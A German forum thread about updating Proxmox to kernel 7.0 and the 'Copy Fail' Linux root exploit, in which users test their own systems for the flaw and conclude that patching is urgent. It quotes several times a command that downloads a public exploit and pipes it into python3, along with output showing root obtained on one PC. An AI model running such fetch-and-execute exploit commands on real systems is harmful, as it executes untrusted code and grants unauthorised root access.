Neuer ioBroker-Blog online: Monatsrückblick März/April 2026

MartinP

Gleich wird es spannend ...

Unpacking proxmox-kernel-7.0.0-3-pve-signed (7.0.0-3) ...

Eigentlich habe ich Vorbehalte gegen Versionen mit einer "0" nach dem ersten Punkt

Das ist auch interessant bzgl. des Vorgänger Kernels 6.17-6

Automatic installation of modules for kernel 6.17.13-6-pve was skipped since the kernel headers for this kernel do not seem to be installed.

Thomas Braun

@MartinP sagte:

Eigentlich habe ich Vorbehalte gegen Versionen mit einer "0" nach dem ersten Punkt

Beim Kernel hat das nichts zu sagen. Die Major-Version wird da nicht (mehr) bei größeren technischen Sprüngen erhöht sondern dann, wenn Linus Torwalds die Finger und Zehen zum zählen der Versionsnummern ausgehen. Deswegen jetzt der Sprung von 6.19.x auf 7.0.y.

MartinP

Alles smooth verlaufen. Alle Zahnräder drehen nach dem Update wieder

Meister Mopper

@MartinP sagte:

Alles smooth verlaufen. Alle Zahnräder drehen nach dem Update wieder

Auch wenn Linus Torwalds dies aus zeitlichen Gründen macht, bin ich bei '*.0' auch vorsichtig.
Man hat ja die Möglichkeit, den laufenden Kernel zu pinnen und im Proxmox-Forum zu schauen, was sich tut.

Ich beobachte lieber noch ein bisschen .

Thomas Braun

@Meister-Mopper sagte:

bin ich bei '*.0' auch vorsichtig.

Kann man ja sein. Aber die gleiche Vorsicht musst du dann auch von 6.13 auf 6.14 walten lassen. Wie gesagt, die Versionsnummern beim Kernel sind vollkommen ohne Aussagen über größere Änderungen.
BTW:

[thomas@roamer ~]$ uname -r
7.0.2-arch1-1
[thomas@roamer ~]$ 

Meister Mopper

@Thomas-Braun sagte:

@Meister-Mopper sagte:

bin ich bei '*.0' auch vorsichtig.

Kann man ja sein. Aber die gleiche Vorsicht musst du dann auch von 6.13 auf 6.14 walten lassen. Wie gesagt, die Versionsnummern beim Kernel sind vollkommen ohne Aussagen über größere Änderungen.
BTW:

[thomas@roamer ~]$ uname -r
7.0.2-arch1-1
[thomas@roamer ~]$ 

Gewohnheitsgemäß bleibe ich bei meinem Produktivsystem vorerst beim alten Kernel.

@Thomas-Braun sagte:

6.13 auf 6.14

Und auch da kann ich pinnen.

MartinP

Dann musst Du aber ggfs mit der Kernel-Verwundbarkeit für "copy fail" leben...

https://www.heise.de/news/Copy-Fail-Linux-root-in-allen-grossen-Distributionen-mit-732-Byte-Python-11277590.html

Auf meiner Proxmox-Kiste (in einem LXC-Container)

frigate@ubuntu-frigate-privileged:~$ curl https://copy.fail/exp | python3 && su
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   2924      0 --:--:-- --:--:-- --:--:--  2935
Password: su: Authentication failure
Password: 

Auf meinem Linux-Mint-PC

martin@martin-D2836-S1:~$ curl https://copy.fail/exp | python3 && su
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   5595      0 --:--:-- --:--:-- --:--:--  5666
# ls
'2026-01-26 16-59-47.mp4'   Videos		   output.tem
 Arduino		    Vorlagen		   output_text.txt
 Auswahl_238.png	    coral		   page.htm
 Bilder			    ems_esp_flasher	   programs
 DemonEditor		    esp_test_ota_prog.sh   pwmkurve.png
 Dokumente		    gitea		   serial_ACM0.sh

Der Unterschied zwischen PVE und Linux mint ist, dass bei Mint su ohne Passwordeingabe erreicht werden kann...

Thomas Braun

@MartinP sagte:

curl https://copy.fail/exp | python3 && su

echad@chet:~ $ curl https://copy.fail/exp | python3 && su
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   1389      0 --:--:-- --:--:-- --:--:--  1389
sh: 1: su: Exec format error
-bash: /usr/bin/su: Kann die Binärdatei nicht ausführen: Fehler im Format der Programmdatei
echad@chet:~ $ 

[thomas@roamer ~]$ curl https://copy.fail/exp | python3 && su
  % Total    % Received % Xferd  Average Speed  Time    Time    Time   Current
                                 Dload  Upload  Total   Spent   Left   Speed
100    731   0    731   0      0   1054      0                              0
Passwort: su: Fehler beim Ändern des Authentifizierungstoken
Passwort: 

Hier funktioniert das nicht.

Meister Mopper

@MartinP sagte:

Dann musst Du aber ggfs mit der Kernel-Verwundbarkeit für "copy fail" leben...

Ich sehe das nicht als "Zero Day" Geschichte, sondern als "nutze regelmäßige Updates".

MartinP

@Thomas-Braun sagte:

Hier funktioniert das nicht.

Hat Dein System überhaupt eine Intel x64 CPU?
Dafür ist das Exploit geschrieben.

Das heißt aber nicht, dass die Lücke nicht auch auf Kernels für ARM-Prozessoren existiert ....

Thomas Braun

@MartinP

Der host roamer ja:

[thomas@roamer ~]$ fastfetch 
                     ./o.                   thomas@roamer
                   ./sssso-                 -------------
                 `:osssssss+-               OS: EndeavourOS x86_64
               `:+sssssssssso/.             Host: 83A2 (Lenovo V17 G4 IRU)
             `-/ossssssssssssso/.           Kernel: Linux 7.0.2-arch1-1
           `-/+sssssssssssssssso+:`         Uptime: 47 mins
         `-:/+sssssssssssssssssso+/.        Packages: 1383 (pacman)
       `.://osssssssssssssssssssso++-       Shell: bash 5.3.9
      .://+ssssssssssssssssssssssso++:      Display (AUO439D): 1920x1080 in 17", 60 Hz [Built-in]
    .:///ossssssssssssssssssssssssso++:     DE: KDE Plasma 6.6.4
  `:////ssssssssssssssssssssssssssso+++.    WM: KWin (Wayland)
`-////+ssssssssssssssssssssssssssso++++-    WM Theme: Breeze
 `..-+oosssssssssssssssssssssssso+++++/`    Theme: Breeze (Dark) [Qt], Breeze-Dark [GTK2], Breeze [GTK3]
   ./++++++++++++++++++++++++++++++/:.      Icons: breeze-dark [Qt], breeze-dark [GTK2/3/4]
  `:::::::::::::::::::::::::------``        Font: Noto Sans (10pt) [Qt], Noto Sans (10pt) [GTK2/3/4]
                                            Cursor: breeze (24px)
                                            Terminal: konsole 26.4.0
                                            CPU: 13th Gen Intel(R) Core(TM) i5-1335U (12) @ 4.60 GHz
                                            GPU: Intel Iris Xe Graphics @ 1.25 GHz [Integrated]
                                            Memory: 4.36 GiB / 15.34 GiB (28%)
                                            Swap: 0 B / 16.88 GiB (0%)
                                            Disk (/): 107.75 GiB / 912.64 GiB (12%) - btrfs
                                            Disk (/run/media/thomas/Ventoy): 55.31 GiB / 58.56 GiB (94%) - exfat [External]
                                            Local IP (wlan0): 192.168.178.44/24
                                            Battery (L20M3PF0): 59% [Discharging]
                                            Locale: de_DE.UTF-8

                                                                    
                                                                    
[thomas@roamer ~]$ 

Auf dem echad (Ist ein Raspberry4) bin ich nur zufällig gewesen.

MartinP

@meister-mopper

Ich sehe das nicht als "Zero Day" Geschichte

Es ist inzwischen keine Zero Day Lücke mehr, weil ein Beispiel-Exploit veröffentlicht wurde, die Kernel-Entwickler schon 4 Wochen informiert sind (also eher eine 28-Day Lücke), und es Patches gibt ...

Ein Zero Day (auch manchmal „0day“ genannt) ist eine Sicherheitslücke, die den Entwicklern der betroffenen Anwendung noch nicht gemeldet wurde, sodass sie „null Tage Zeit“ hatten, sie zu beheben – daher der Name.

Bist Du der Meinung, dass das die Lücke harmloser macht, sodass man mit dem Einspielen von Fixes länger, als bei einem Zero-Day warten kann?

Thomas Braun

@MartinP

Deswegen gilt:

However, for most users, the best approach is to install vendor kernel updates and reboot into the patched kernel.

Also was ich auch immer sage: Kiste aktuell halten. Immer und regelmäßig.

Meister Mopper

@MartinP

Bist du der Meinung, dass der Proxmox 7.x Kernel installiert werden sollte, weil er das System sicherer macht? Und wenn ja warum und bitte mit Begründung.

Danke!

Thomas Braun

@Meister-Mopper sagte:

Bist du der Meinung, dass der Proxmox 7.x Kernel installiert werden sollte, weil er das System sicherer macht?

Users and administrators should apply the latest kernel security updates from their distribution as soon as possible.

However, for most users, the best approach is to install vendor kernel updates and reboot into the patched kernel.

MartinP

Bist du der Meinung, dass der Proxmox 7.x Kernel installiert werden sollte, weil er das System sicherer macht?

Bist du der festen Überzeugung dass die Copy Fail Sicherheitslücke in einer typischen iobroker Installation NICHT ausgenutzt werden kann?

Im Kernel log steht, dass die Lücke dort am 22.Apr geschlossen wurde

https://lore.kernel.org/linux-cve-announce/?t=20260422135722

https://www.reddit.com/r/Proxmox/comments/1szc46a/this_will_be_fun_cve202631431/

PVE just pushed kernel 7 in non-enterprise and the bug was repaired in kernel 6.19.12 or higher.

Meister Mopper

@MartinP

Vielen Dank, das ist somit sehr dringlich und wird von Proxmox auch im Forum empfohlen.

Die Updates laufen bei mir bereits.